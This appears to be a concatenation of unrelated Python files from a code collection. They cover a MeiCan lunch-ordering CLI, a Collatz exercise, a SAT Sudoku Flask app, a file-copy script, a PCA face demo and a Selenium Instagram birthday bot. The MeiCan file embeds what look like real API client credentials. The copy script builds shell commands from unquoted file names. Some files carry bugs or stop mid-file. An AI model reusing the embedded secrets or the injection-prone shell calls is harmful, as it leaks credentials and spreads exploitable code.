    RED = '\033[31m'
    GREEN = '\033[32m'
    YELLOW = '\033[33m'
    BLUE = '\033[34m'
    PURPLE = '\033[35m'
    AZURE = '\033[36m'
    WHITE = '\033[37m'
    BOLD = '\033[1m'
    NORMAL = '\033[0m'

    @classmethod
    def _wrap(cls, code, msg):
        # surround *msg* with the escape code and a reset
        return code + msg + cls.NORMAL

    @classmethod
    def black(cls, msg):
        return cls._wrap(cls.BLACK, msg)

    @classmethod
    def red(cls, msg):
        return cls._wrap(cls.RED, msg)

    @classmethod
    def green(cls, msg):
        return cls._wrap(cls.GREEN, msg)

    @classmethod
    def yellow(cls, msg):
        return cls._wrap(cls.YELLOW, msg)

    @classmethod
    def blue(cls, msg):
        return cls._wrap(cls.BLUE, msg)

    @classmethod
    def purple(cls, msg):
        return cls._wrap(cls.PURPLE, msg)

    @classmethod
    def azure(cls, msg):
        return cls._wrap(cls.AZURE, msg)

    @classmethod
    def white(cls, msg):
        return cls._wrap(cls.WHITE, msg)
def json_decode(json_str):
    """Parse *json_str* after converting single quotes to double quotes.

    Allows Python-dict-style input like "{'a': 1}" on the command line.
    """
    normalized = json_str.replace('\'', '"')
    return json.loads(normalized)
def main():
    """CLI entry point: merge config sources, log in to MeiCan, and auto-order lunch.

    Config precedence: --config file first, then individual CLI flags override.
    For each open ordering window today, pick a favourite dish if one matches,
    otherwise a random recommended dish, and place the order.
    """
    args = docopt(__doc__, version=__version__)
    # Load the config file (if given), then let explicit CLI flags override it.
    config = {}
    if args['--config']:
        with open(args['--config']) as conf:
            config = json_decode(conf.read())
    if args['--user']:
        config['user'] = args['--user']
    if args['--password']:
        config['password'] = args['--password']
    if args['--appid']:
        config['appid'] = args['--appid']
    if args['--appsecret']:
        config['appsecret'] = args['--appsecret']
    if args['--favourite']:
        config['favourite'] = json_decode(args['--favourite'])
    if args['--debug']:
        config['debug'] = True
    # No configuration at all: show usage and exit.
    if not config:
        print(__doc__)
        exit(1)
    # Fill in defaults for anything still missing.
    if 'favourite' not in config:
        config['favourite'] = []
    if 'appid' not in config:
        config['appid'] = 'HRVmPZebY51X4mmhaKfAR2vhuISn1nR'
    if 'appsecret' not in config:
        config['appsecret'] = 'qTgaAN6h6MsKi6c76kNHUZVbujihwpd'
    if 'debug' not in config:
        config['debug'] = False
    conf = McanConf(
        client_id=config['appid'],
        client_secret=config['appsecret'],
        username=config['user'],
        password=config['password'],
        debug=config['debug']
    )
    mcan = McanApp(conf)
    today = date.today().isoformat()
    logger.info(ConsoleFormat.yellow('获取用户信息...'))
    logger.info(ConsoleFormat.white(' 姓名: ' + mcan.user['username']))
    calendaritems_list = mcan.get_calendaritems_list(today, today)
    calendar_list = calendaritems_list['dateList'][0]['calendarItemList']
    for calendar_item in calendar_list:
        # Map each window's status to a description and display color.
        order_available = False
        if calendar_item['status'] == 'AVAILABLE':
            order_available = True
            status_desc = '可点餐'
            console_format = ConsoleFormat.green
        elif calendar_item['status'] == 'CLOSED':
            status_desc = '已关闭'
            console_format = ConsoleFormat.white
        elif calendar_item['status'] == 'ORDER':
            status_desc = '已点餐'
            dish_item = calendar_item['corpOrderUser']['restaurantItemList'][0]['dishItemList'][0]
            status_desc += ' {} x {}'.format(dish_item['dish']['name'], dish_item['count'])
            console_format = ConsoleFormat.blue
        else:
            status_desc = '状态未知'
            console_format = ConsoleFormat.red
        logger.info(console_format(' {} {} {}'.format(calendar_item['openingTime']['postboxOpenTime'],
                                   calendar_item['openingTime']['name'], status_desc)))
        if not order_available:
            continue
        tab_uuid = calendar_item['userTab']['uniqueId']
        corp_addr_uuid = calendar_item['userTab']['corp']['addressList'][0]['uniqueId']
        tg_time = '{} {}'.format(today, calendar_item['openingTime']['closeTime'])
        logger.info(ConsoleFormat.yellow('获取推荐菜品...'))
        recommended_dishes = mcan.get_recommendations_dishes(tab_uuid, tg_time)
        dishes_list = recommended_dishes['othersRegularDishList']
        logger.info(ConsoleFormat.green('今日推荐:'))
        for dishes in dishes_list:
            logger.info(' ' + ConsoleFormat.white(dishes['name']))
        def select_dishes(favourite_list, dishes_list):
            # first favourite whose name is a substring of a recommended dish wins
            for favourite in favourite_list:
                for dishes in dishes_list:
                    if dishes['name'].find(favourite) != -1:
                        return dishes
            return None
        selected_dishes = select_dishes(config['favourite'], dishes_list)
        # no favourite matched: fall back to a random recommendation
        if selected_dishes is None:
            selected_dishes = dishes_list[randint(0, len(dishes_list) - 1)]
        logger.info(ConsoleFormat.green('已为您选择: ' + selected_dishes['name']))
        order_list = [{'count': 1, 'dishId': selected_dishes['id']}]
        logger.info(ConsoleFormat.yellow('正在为您下单...'))
        resp = mcan.orders_add(tab_uuid, corp_addr_uuid, tg_time, json.dumps(order_list))
        logger.info(ConsoleFormat.green('已成功下单: '))
        logger.info(' %s x %s' % (ConsoleFormat.white(selected_dishes['name']), ConsoleFormat.white(str(1))))
        logger.info('%s %s', ConsoleFormat.green('订单号:'), ConsoleFormat.red(resp['order']['uniqueId']))
| true |
8321fec1c4db68d4ff416a76c9b577d72ce737cd | Python | TredonA/CollatzConjectureExercise | /CollatzConjectureExercise.py | UTF-8 | 787 | 4.28125 | 4 | [] | no_license | # Collatz Conjecture | By Tredon Austin
# Quick exercise for the well known Collatz Conjecture problem. Going to do
# an initial implementation and then updating if there's a more optimal
# solution.
def collatzConjecture(num):
    """Return the number of Collatz steps needed to reach 1 from *num*.

    num must be a positive integer; recursion depth equals the step count.
    """
    if num == 1:
        return 0
    if num % 2 == 0:
        # Floor division keeps the value an int: the original `num / 2`
        # produced floats, which lose precision for very large inputs.
        return 1 + collatzConjecture(num // 2)
    return 1 + collatzConjecture((num * 3) + 1)
userInput = input("Please enter the number that you would like to know the" +
                  " solution to the Collatz Conjecture for: ")
# Re-prompt until the input is a positive whole number.  The original loop
# never read new input (so an invalid entry spun forever) and called int()
# before isdigit(), raising ValueError on non-numeric input.
while not userInput.isdigit() or int(userInput) < 1:
    userInput = input("Input Invalid! Please enter a whole number greater than 0: ")
answer = collatzConjecture(int(userInput))
print("The number of steps that your number takes is " + str(answer))
| true |
121025b0452e360a828622e68fe9a75aa3f37f42 | Python | BZukerman/StepikRepo | /Python_Programming/2. Cycles, Strings, Lists/Sum_Until_0.py | UTF-8 | 722 | 3.578125 | 4 | [] | no_license | # Напишите программу, которая считывает с консоли числа (по одному в строке) до тех пор,
# пока сумма введённых чисел не будет равна 0 и сразу после этого выводит сумму квадратов
# всех считанных чисел.
#
# 1, -3, 5, -6, -10, 13, 4, -8
Sum = 0
Sum_Quad = 0
Exit = False
while not Exit:
S_in = int(input())
# print(S_in)
Sum = Sum + S_in
# print(Sum)
S_Quad = S_in * S_in
Sum_Quad = Sum_Quad + S_Quad
# print(Sum_Quad)
if Sum == 0:
Exit = True
# print(Sum_Quad)
# print(Sum)
break
print(Sum_Quad)
| true |
81cc8766763dded4511b1b8315f31c70aa5e1b1b | Python | haedeausi/SudokuSAT | /json_io.py | UTF-8 | 5,404 | 2.859375 | 3 | [] | no_license | from flask import Flask, render_template, request, url_for
import random, json, os, sys, getopt, time, pycosat
# Global holding the most recently computed Sudoku solution, shared between routes.
sol = []
# Serve static assets from the script's own directory.
app = Flask(__name__, static_folder = os.path.abspath(os.path.dirname(sys.argv[0])))
@app.route('/')
def init():
    """Serve the Sudoku input page."""
    return render_template('index.html')
@app.route('/problem_submission', methods = ['POST'])
def get_problem_instance():
    """Receive a Sudoku grid from the page, solve it, and stash the result in `sol`."""
    global sol
    # NOTE(review): assumes the form field 'javascript_data' holds a JSON 9x9 grid
    # of ints (0 = empty) — confirm against the page's submit code.
    jsdata = request.form["javascript_data"]
    data = json.loads(jsdata)
    sol = solve_problem(data)
    return jsdata
@app.route('/solution_request')
def send_problem_solution():
    """Return the last computed solution as JSON: {"solution": <grid>}."""
    json_helper = {}
    json_helper['solution'] = sol
    json_object = json.dumps(json_helper)
    return json_object
# def help():
# print('Usage:')
# print('Sudoku.py -e [or] --easy')
# print('Sudoku.py -m [or] --medium')
# print('Sudoku.py -h [or] --hard')
# print('Sudoku.py -v [or] --evil')
# print('Sudoku.py -b [or] --blank')
# print('All problems generated by websudoku.com')
# sys.exit()
def solve_problem(problemset):
    """Solve *problemset* in place via the SAT solver and return the solved grid.

    NOTE(review): relies on `pprint` being imported by the __main__ block
    below — this function fails with NameError if called before that import.
    """
    print('Problem:')
    pprint(problemset)
    solve(problemset)
    print('Answer:')
    pprint(problemset)
    return problemset
def v(i, j, d):
    """Map cell (i, j) holding digit d (all 1-based) to a unique SAT variable in 1..729."""
    return (i - 1) * 81 + (j - 1) * 9 + d
#Reduces Sudoku problem to a SAT clauses
def sudoku_clauses():
    """Build the fixed CNF clauses encoding the rules of Sudoku.

    Returns a list of clauses (lists of signed variable ids from v()):
    cell constraints, row/column uniqueness, and 3x3 region uniqueness.
    """
    res = []
    # for all cells, ensure that the each cell:
    for i in range(1, 10):
        for j in range(1, 10):
            # denotes (at least) one of the 9 digits (1 clause)
            res.append([v(i, j, d) for d in range(1, 10)])
            # does not denote two different digits at once (36 clauses)
            for d in range(1, 10):
                for dp in range(d + 1, 10):
                    res.append([-v(i, j, d), -v(i, j, dp)])
    def valid(cells):
        # no two cells in this group may share any digit
        for i, xi in enumerate(cells):
            for j, xj in enumerate(cells):
                if i < j:
                    for d in range(1, 10):
                        res.append([-v(xi[0], xi[1], d), -v(xj[0], xj[1], d)])
    # ensure rows and columns have distinct values
    for i in range(1, 10):
        valid([(i, j) for j in range(1, 10)])
        valid([(j, i) for j in range(1, 10)])
    # ensure 3x3 sub-grids "regions" have distinct values
    for i in 1, 4, 7:
        for j in 1, 4 ,7:
            valid([(i + k % 3, j + k // 3) for k in range(9)])
    # sanity check on the expected clause count
    assert len(res) == 81 * (1 + 36) + 27 * 324
    return res
def solve(grid):
    """Solve a 9x9 Sudoku *grid* (0 = empty) in place using pycosat."""
    #solve a Sudoku problem
    clauses = sudoku_clauses()
    for i in range(1, 10):
        for j in range(1, 10):
            d = grid[i - 1][j - 1]
            # For each digit already known, a clause (with one literal).
            if d:
                clauses.append([v(i, j, d)])
    # Print number SAT clause
    numclause = len(clauses)
    print ("P CNF " + str(numclause) +"(number of clauses)")
    # solve the SAT problem
    start = time.time()
    sol = set(pycosat.solve(clauses))
    end = time.time()
    print("Time: "+str(end - start))
    def read_cell(i, j):
        # return the digit of cell i, j according to the solution
        for d in range(1, 10):
            if v(i, j, d) in sol:
                return d
    # write the solved digits back into the caller's grid
    for i in range(1, 10):
        for j in range(1, 10):
            grid[i - 1][j - 1] = read_cell(i, j)
if __name__ == '__main__':
    from pprint import pprint
    # Sudoku problem generated by websudoku.com
    easy = [[0, 0, 0, 1, 0, 9, 4, 2, 7],
            [1, 0, 9, 8, 0, 0, 0, 0, 6],
            [0, 0, 7, 0, 5, 0, 1, 0, 8],
            [0, 5, 6, 0, 0, 0, 0, 8, 2],
            [0, 0, 0, 0, 2, 0, 0, 0, 0],
            [9, 4, 0, 0, 0, 0, 6, 1, 0],
            [7, 0, 4, 0, 6, 0, 9, 0, 0],
            [6, 0, 0, 0, 0, 8, 2, 0, 5],
            [2, 9, 5, 3, 0, 1, 0, 0, 0]]
    medium = [[5, 8, 0, 0, 0, 1, 0, 0, 0],
              [0, 3, 0, 0, 6, 0, 0, 7, 0],
              [9, 0, 0, 3, 2, 0, 1, 0, 6],
              [0, 0, 0, 0, 0, 0, 0, 5, 0],
              [3, 0, 9, 0, 0, 0, 2, 0, 1],
              [0, 5, 0, 0, 0, 0, 0, 0, 0],
              [6, 0, 2, 0, 5, 7, 0, 0, 8],
              [0, 4, 0, 0, 8, 0, 0, 1, 0],
              [0, 0, 0, 1, 0, 0, 0, 6, 5]]
    evil = [[0, 2, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 6, 0, 0, 0, 0, 3],
            [0, 7, 4, 0, 8, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 3, 0, 0, 2],
            [0, 8, 0, 0, 4, 0, 0, 1, 0],
            [6, 0, 0, 5, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 7, 8, 0],
            [5, 0, 0, 0, 0, 9, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 4, 0]]
    hard = [[0, 2, 0, 0, 0, 0, 0, 3, 0],
            [0, 0, 0, 6, 0, 1, 0, 0, 0],
            [0, 6, 8, 2, 0, 0, 0, 0, 5],
            [0, 0, 9, 0, 0, 8, 3, 0, 0],
            [0, 4, 6, 0, 0, 0, 7, 5, 0],
            [0, 0, 1, 3, 0, 0, 4, 0, 0],
            [9, 0, 0, 0, 0, 7, 5, 1, 0],
            [0, 0, 0, 1, 0, 4, 0, 0, 0],
            [0, 1, 0, 0, 0, 0, 0, 9, 0]]
    blank = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0],
             [0, 0, 0, 0, 0, 0, 0, 0, 0]]
    if(len(sys.argv[1:]) == 0):
        print('Argument error, check --help')
    else:
        # NOTE(review): `main` is not defined anywhere in this file (the CLI
        # `help` function above is commented out) — this call raises NameError
        # whenever arguments are supplied.  Confirm the intended entry point.
        main(sys.argv[1:])
    app.run(debug=True)
| true |
f7ad66a1227e10d3dd437019af98370f9e396fc3 | Python | girish/utils | /dumps/copyallfiles_above_500_words.py | UTF-8 | 363 | 2.65625 | 3 | [] | no_license | import os
import sys
import commands
# Python 2 script: copy every .txt file found under sys.argv[1] whose word
# count exceeds 450 into sys.argv[2], renaming them 0.txt, 1.txt, ...
# (The repo filename says "above 500 words", but the coded threshold is 450.)
files= commands.getoutput("find %s -type f | grep '\.txt'" %(sys.argv[1])).split("\n")
count= 0
for file in files:   # NOTE: 'file' shadows the Python 2 builtin of the same name
    #print count
    word_count=commands.getoutput("wc -w %s" %(file)).split(" ")[0]   # first token of `wc -w` output
    if int(word_count) > 450 :
        print word_count
        print file
        os.system("cp %s %s/%d.txt" %(file, sys.argv[2], count))   # relies on `import os` at the top of the file
        count +=1
| true |
f6e5844c11a4098c1eacd40854cac4463b1d795f | Python | slamdunk0414/python | /3.字符串列表数组/1.字符串.py | UTF-8 | 393 | 4.25 | 4 | [] | no_license |
# 这就是一个字符串
name = 'laozhang'
# 输入 input
# input('请输入一个字符串')
# 输出 print
# print('输出字符串')
# 字符串的加法
a = 'ni'
b = 'hao'
c = a + b
print(c)
# 字符串的另外一种加法
e = '===%s==='%(a+b)
print(e)
# 字符串下标
name = 'laozhang'
a = name[1]
print(a)
# 取字符串最后一个字符 -1下标
b = name[-1]
print(b) | true |
e6e70adb67f901f4d82187a1c42708168aeb57b9 | Python | Algorithm-P0/meanjung | /2020/1try/5_dp/11057.py | UTF-8 | 251 | 2.640625 | 3 | [] | no_license | import sys
# Digit-string DP (file path suggests BOJ problem 11057), answers mod 10007.
N = int(sys.stdin.readline())
# dp[i][j] = count of length-i digit strings that start with digit j and in
# which every following digit is >= its predecessor.
dp=[[0]*10 for _ in range(N+1)]
dp[1]=[1]*10  # base case: each single digit counts once (assumes N >= 1)
for i in range(2, N+1):
    for j in range(10):
        s=0
        for k in range(j,10):   # the next digit k may be any digit >= j
            s+=dp[i-1][k]
        dp[i][j]=s%10007
print(sum(dp[N])%10007)   # total over every possible leading digit
| true |
75f330c43692214728b87e77a5e1df5c1e90941d | Python | 1emb/AI-1 | /PCA .py | UTF-8 | 2,236 | 2.578125 | 3 | [] | no_license | import os
import numpy as np
from scipy import misc # Import tat ca moi thu can
import cv2
import matplotlib.pyplot as plt
np.random.seed(9)
# Read the face-image files (path points at a YALE faces folder)
path = 'D:/Minh/Python/YALE/unpadded/' # path to the database
ids = range(1, 16) # 15 persons
states = ['centerlight', 'glasses', 'happy', 'leftlight',
       'noglasses', 'normal', 'rightlight','sad',
       'sleepy', 'surprised', 'wink' ]
prefix = 'subject'
surfix = '.pgm'
# data dimension
h = 116 # hight
w = 98 # width
D = h * w
N = len(states)*15
K = 100
# collect all data: one flattened image per COLUMN of X
X = np.zeros((D, N))
cnt = 0
for person_id in range(1, 16):
    for state in states:
        fn = path + prefix + str(person_id).zfill(2) + '.' + state + surfix
        X[:, cnt] = misc.imread(fn).reshape(D)   # NOTE: scipy.misc.imread was removed in SciPy >= 1.2
        cnt += 1
# Doing PCA, note that each row is a datapoint
from sklearn.decomposition import PCA
pca = PCA(n_components=K) # K = 100
pca.fit(X.T)
# projection matrix
U = pca.components_.T
# For the 'centerlight' image of the first six subjects: save the original,
# then encode/decode through the K principal components and save the result.
for person_id in range(1, 7):
    for state in ['centerlight']:
        fn = path + prefix + str(person_id).zfill(2) + '.' + state + surfix
        im = misc.imread(fn)
        plt.axis('off')
        f1 = plt.imshow(im, interpolation='nearest')
        f1.axes.get_xaxis().set_visible(True)
        f1.axes.get_yaxis().set_visible(False)
        plt.gray()
        fn = 'ori' + str(person_id).zfill(2) + '.png'
        plt.savefig(fn, bbox_inches='tight', pad_inches=0)
        plt.show()
        # reshape and subtract mean
        x = im.reshape(D, 1) - pca.mean_.reshape(D, 1)
        # encode
        z = U.T.dot(x)
        #decode
        x_tilde = U.dot(z) + pca.mean_.reshape(D, 1)
        # reshape to orginal dim
        im_tilde = x_tilde.reshape(116, 98)
        # Compute the reconstruction error (L2 norm, averaged per pixel)
        loss = np.sqrt(np.sum((im - im_tilde)**2))
        loss /= im.size
        print(loss)
        # Plot the reconstructed image
        plt.axis('on')
        f1 = plt.imshow(im_tilde, interpolation='nearest')
        f1.axes.get_xaxis().set_visible(False)
        f1.axes.get_yaxis().set_visible(False)
        plt.gray()
        fn = 'res' + str(person_id).zfill(2) + '.png'
        plt.savefig(fn, bbox_inches='tight', pad_inches=0)
        plt.show()
| true |
5fb5647e7f3712cf9eaf3101873ea4b67b11086e | Python | iriszero48/Trash | /sese/4.py | UTF-8 | 996 | 2.671875 | 3 | [
"MIT"
] | permissive | import json
import os
import sys
# Converts text corpora to JSON-lines.  All file paths and JSON keys in this
# copy have been blanked to empty strings -- presumably scrubbed; confirm
# against the original repo before relying on them.
base_path = ''
with open('', 'w', encoding='utf-8') as out:
    fp = os.path.join(base_path, '')
    sys.stderr.write(f'-> {fp}\n')   # progress log on stderr
    with open(fp, 'r', encoding='utf-8') as fs:
        # strip one trailing newline per line, then keep only non-empty lines
        for line in filter(lambda l: len(l) != 0, map(lambda l: l.removesuffix('\r\n').removesuffix('\n'), fs)):
            out.write(json.dumps({'': line}, ensure_ascii=False) + '\n')
for cwd, _, files in os.walk(os.path.join(base_path, '')):
dir = os.path.basename(cwd)
find_pos = [dir.find('('), dir.find('(')]
dir = dir[:max(find_pos)]
        for filename in files:
            fp = os.path.join(cwd, filename)
            sys.stderr.write(f'-> {fp}\n')
            # 'ansi' is a Windows-only codec name (the active ANSI code page)
            with open(fp, 'r', encoding='ansi') as fs:
                for line in filter(lambda l: len(l) != 0, map(lambda l: l.removesuffix('\r\n').removesuffix('\n'), fs)):
                    # NOTE(review): both keys are '' so the second entry
                    # overwrites the first -- only `dir` survives; confirm intent.
                    out.write(json.dumps(
                        {'': line, '': dir}, ensure_ascii=False) + '\n')
| true |
337b2091255aba23d091385f580655f710ab5c52 | Python | nahaza/pythonTraining | /ua/univer/HW04/ch06ProgTrain05.py | UTF-8 | 521 | 4.3125 | 4 | [] | no_license | # 5. Sum of Numbers
# Assume a file containing a series of integers is named numbers.txt and exists
# on the computer’s disk. Write a program that reads all of the numbers stored in the file and calculates
# their total.
def main():
    """Read every integer in numbers.txt (one per line) and print the total.

    Bug fix: the original called readline() both before and inside a
    ``for numb in fromFile`` loop.  Iteration and readline() share the file
    position, so the first value and every second value after it were
    silently skipped and the printed total was wrong.
    """
    total = 0
    # 'with' guarantees the file is closed even if a line fails to parse.
    with open('numbers.txt', 'r') as from_file:
        for line in from_file:
            total += int(line)  # int() tolerates the trailing newline
    print(total)


if __name__ == '__main__':
    main()
| true |
a490c78657f1f985d024fc2d0571d42e6ee2b55e | Python | prashantstha1717/IWPythonProject | /IWPythonProject/data_types/Q6.py | UTF-8 | 644 | 4.15625 | 4 | [] | no_license | # Write a Python program to find the first appearance of the substring 'not' and
# 'poor' from a given string; if 'poor' follows the 'not', replace the whole 'not'...'poor'
# substring with 'good'. Return the resulting string.
# Sample String : 'The lyrics is not that poor!'
# 'The lyrics is poor!'
# Expected Result : 'The lyrics is good!'
# 'The lyrics is poor!
def out6(str1):
    """Replace the span from the first 'not' through the first 'poor' with
    'good' when 'poor' occurs after 'not'; otherwise return str1 unchanged.

    Bug fix: the original tested ``nots > 0`` and ``poors > 0``, which
    wrongly treated a substring found at index 0 as "not found".
    str.find signals absence with -1, so that is what must be tested.
    """
    nots = str1.find('not')
    poors = str1.find('poor')
    if nots != -1 and poors != -1 and poors > nots:
        # poors + 4 includes the whole word 'poor' in the replaced span.
        return str1.replace(str1[nots:poors + 4], 'good')
    return str1
print(out6('The lyrics is not that poor'))
| true |
c9854220baf1fc202dc50cb95958a103d0f163b2 | Python | Little-old-brother-team/GroupWork | /Week2/Method2.py | UTF-8 | 653 | 3.5625 | 4 | [] | no_license | from datetime import datetime
def whatday(Year, Month, Day):
    """Return the weekday name for the given calendar date.

    Counts days elapsed since Monday, 1900-01-01, and maps the offset
    (mod 7) onto the weekday names.
    """
    anchor = datetime(1900, 1, 1)
    target = datetime(Year, Month, Day)
    elapsed = (target - anchor).days
    # (elapsed + 1) % 7 gives 1 for Monday ... 6 for Saturday and 0 for
    # Sunday -- the same mapping the original if/elif ladder spelled out.
    names = ['Sunday', 'Monday', 'Tuesday', 'Wednesday',
             'Thursday', 'Friday', 'Saturday']
    return names[(elapsed + 1) % 7]
print(whatday(1993,6,23)) | true |
ead980af51edd2d4170960d38535e4f5847a2e08 | Python | Shubhrima/Birthday-Wishing-Instagram-Bot | /automated messages.py | UTF-8 | 2,792 | 2.90625 | 3 | [] | no_license | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
import pandas
import datetime as dt
CHROME_DRIVER_PATH ="C:\development\chromedriver.exe"
USERNAME = input('Enter instagram handle: ')
PASSWORD = input('Enter password: ')
class Automated_Message:
    """Selenium bot that logs into Instagram and DMs a birthday greeting.

    Relies on hard-coded CSS/XPath selectors scraped from instagram.com,
    so it breaks whenever Instagram changes its markup.
    """
    def __init__(self, CHROME_DRIVER_PATH):
        # Start Chrome and load the Instagram login page.
        self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)
        self.driver.get('https://www.instagram.com/accounts/login/')
        sleep(5)  # crude fixed wait for the page to render
    def login(self, ig_handle, login_password):
        # Fill in the login form and submit it.
        username = self.driver.find_element_by_name("username")
        password = self.driver.find_element_by_name("password")
        username.send_keys(ig_handle)
        password.send_keys(login_password)
        log_in = self.driver.find_element_by_css_selector('button.sqdOP.L3NKy.y3zKF')
        log_in.click()
        sleep(5)
    def check_birthday(self):
        # Look up today's birthday in birthday.csv (uses columns name, email,
        # day, month) and DM that account; on ANY failure fall back to a
        # default recipient with a "no birthdays" message.
        try:
            now = dt.datetime.today()
            content = pandas.read_csv('birthday.csv')
            today_date = now.day
            today_month = now.month
            birth_date = content['day']
            content_dict = content.to_dict() # converting to dictionary
            birthdate_day_list = birth_date.to_list()
            birthdate_month_list = content['month'].to_list()
            content_df = content[(content['day'] == today_date) & (content['month'] == today_month)]
            birthday_person = str(content_df.iloc[0]['name'])
            print(birthday_person)
            birthday_acc = str(content_df.iloc[0]['email'])
            print(birthday_acc)
            MESSAGE = 'Happy Birthday'
        except:  # NOTE(review): bare except hides real errors (missing CSV, bad columns)
            MESSAGE = 'No birthdays today'
            birthday_acc = '_shubhrima_'
        # Drive Instagram's DM dialog step by step.
        msg = self.driver.find_element_by_css_selector('.xWeGp svg')
        msg.click()
        print('step 1')
        sleep(5)
        not_now = self.driver.find_element_by_css_selector('button.aOOlW.HoLwm ')
        not_now.click()
        sleep(5)
        send = self.driver.find_element_by_css_selector('button.sqdOP.L3NKy.y3zKF')
        send.click()
        print('step 2')
        text = self.driver.find_element_by_name('queryBox')
        text.send_keys(birthday_acc)
        print('step 3')
        sleep(3)
        choose = self.driver.find_element_by_css_selector('button.dCJp8 span')
        choose.click()
        print('step 4')
        next = self.driver.find_element_by_xpath('/html/body/div[5]/div/div/div[1]/div/div[2]/div/button/div')  # NOTE: 'next' shadows the builtin
        next.click()
        sleep(4)
        message = self.driver.find_element_by_css_selector('textarea')
        message.send_keys(MESSAGE)
        message.send_keys(Keys.ENTER)
bot = Automated_Message(CHROME_DRIVER_PATH)
bot.login(USERNAME, PASSWORD)
bot.check_birthday()
| true |
39e705919137bf72f9e699751be82fb4f98c1422 | Python | HenriBranken/ML_Raschka | /henris_coding/chapter_10/j_log_sqrt.py | UTF-8 | 1,163 | 2.90625 | 3 | [] | no_license | from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Load the housing dataset (whitespace-separated, no header row) and name
# its 14 columns.
df = pd.read_csv("./housing_data.txt", sep="\s+", header=None)
df.columns = ["CRIM", "ZN", "INDUS", "CHAS", "NOX", "RM", "AGE", "DIS", "RAD",
              "TAX", "PTRATIO", "B", "LSTAT", "MEDV"]
X = df[["LSTAT"]].values   # single feature: % LSTAT (see axis label below)
y = df["MEDV"].values      # regression target
regr = LinearRegression()
# Transform the features: fit a straight line to log(LSTAT) vs sqrt(MEDV)
X_log = np.log(X)
y_sqrt = np.sqrt(y)
# Fit the features
regr = regr.fit(X_log, y_sqrt)
X_fit = np.arange(X_log.min() - 1, X_log.max() + 1, 1)[:, np.newaxis]
y_lin_fit = regr.predict(X_fit)
r2_linear = r2_score(y_true=y_sqrt, y_pred=regr.predict(X_log))
print("regr.coef_ = {}.".format(regr.coef_))
print("regr.intercept_ = {}.".format(regr.intercept_))
# Plot the results
plt.scatter(X_log, y_sqrt, label="Training Points", color="silver",
            edgecolor="silver")
plt.plot(X_fit, y_lin_fit,
         label="Linear (d=1), R^2 = {:.3f}".format(r2_linear), c="blue", lw=2)
plt.xlabel("log(% LSTAT)")
plt.ylabel("sqrt([MEDV])")
plt.legend(loc="lower left")
plt.tight_layout()
plt.grid()
plt.show()
| true |
645631ed2ba53b0fada02030db55da896db60aed | Python | Gustaft86/trybe-exercises | /modulo4_ciencia/bloco_34/dia_3/exercicios_dia/exercicio_2_SOLUCAO.py | UTF-8 | 2,149 | 3.578125 | 4 | [] | no_license | from collections.abc import Iterator, Iterable
class Carta:
    """A single playing card: a value (valor) and a suit (naipe)."""

    def __init__(self, valor, naipe):
        self.valor = valor
        self.naipe = naipe

    def __repr__(self):
        # Rendered as e.g. <A de copas>
        return f"<{self.valor} de {self.naipe}>"
class IteradorDoBaralho(Iterator):
    """Explicit iterator over a fixed sequence of cards."""

    def __init__(self, cartas):
        self._cartas = cartas
        self._pos = 0

    def __next__(self):
        # Signal exhaustion once every card has been handed out.
        if self._pos >= len(self._cartas):
            raise StopIteration()
        carta = self._cartas[self._pos]
        self._pos += 1
        return carta
class Baralho(Iterable):
    """A 52-card deck: every value crossed with every suit."""

    naipes = "copas ouros espadas paus".split()
    valores = "A 2 3 4 5 6 7 8 9 10 J Q K".split()

    def __init__(self):
        # Suit-major order: all 13 values of copas, then ouros, and so on.
        self._cartas = [Carta(valor, naipe)
                        for naipe in self.naipes
                        for valor in self.valores]

    def __len__(self):
        return len(self._cartas)

    def __iter__(self):
        return IteradorDoBaralho(self._cartas)
# >>> carteado = Baralho()
# >>> teste = {cartas for cartas in carteado}
# >>> print(teste)
# {
# <J de ouros>,
# <3 de copas>,
# <6 de paus>,
# <Q de ouros>,
# <4 de copas>,
# <7 de paus>,
# <K de ouros>,
# <5 de copas>,
# <8 de paus>,
# <A de espadas>,
# <6 de copas>,
# <9 de paus>,
# <2 de espadas>,
# <7 de copas>,
# <10 de paus>,
# <3 de espadas>,
# <8 de copas>,
# <J de paus>,
# <4 de espadas>,
# <9 de copas>,
# <Q de paus>,
# <5 de espadas>,
# <10 de copas>,
# <K de paus>,
# <6 de espadas>,
# <J de copas>,
# <7 de espadas>,
# <Q de copas>,
# <8 de espadas>,
# <K de copas>,
# <9 de espadas>,
# <A de ouros>,
# <10 de espadas>,
# <2 de ouros>,
# <J de espadas>,
# <3 de ouros>,
# <Q de espadas>,
# <4 de ouros>,
# <K de espadas>,
# <5 de ouros>,
# <A de paus>,
# <6 de ouros>,
# <2 de paus>,
# <7 de ouros>,
# <3 de paus>,
# <8 de ouros>,
# <4 de paus>,
# <9 de ouros>,
# <A de copas>,
# <5 de paus>,
# <10 de ouros>,
# <2 de copas>
# }
# >>>
| true |
ffd91e4f80b7eb941cc9f8bf15ac9e7c5350f1e5 | Python | aryan-upa/CompetitiveCodes | /ConsecutivePrimes(Kickstart2021).py | UTF-8 | 1,623 | 3.734375 | 4 | [] | no_license | # Google Kickstart 2021, Round B, Ques 3
# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000435a5b/000000000077a8e6#problem
from math import ceil,floor,sqrt
def prime(x):
    """Return 1 if x is prime, else 0 (expects x >= 1).

    Bug fix: the original had ``else: return 1`` INSIDE the trial-division
    loop, so it declared a number prime as soon as the first candidate
    divisor failed -- e.g. prime(9) returned 1.  Every divisor up to
    sqrt(x) must be ruled out before returning 1.
    """
    if x == 1:
        return 0
    if x == 2:
        return 1
    for p in range(2, ceil(sqrt(x)) + 1):
        if x % p == 0:
            return 0
    return 1
z= input()
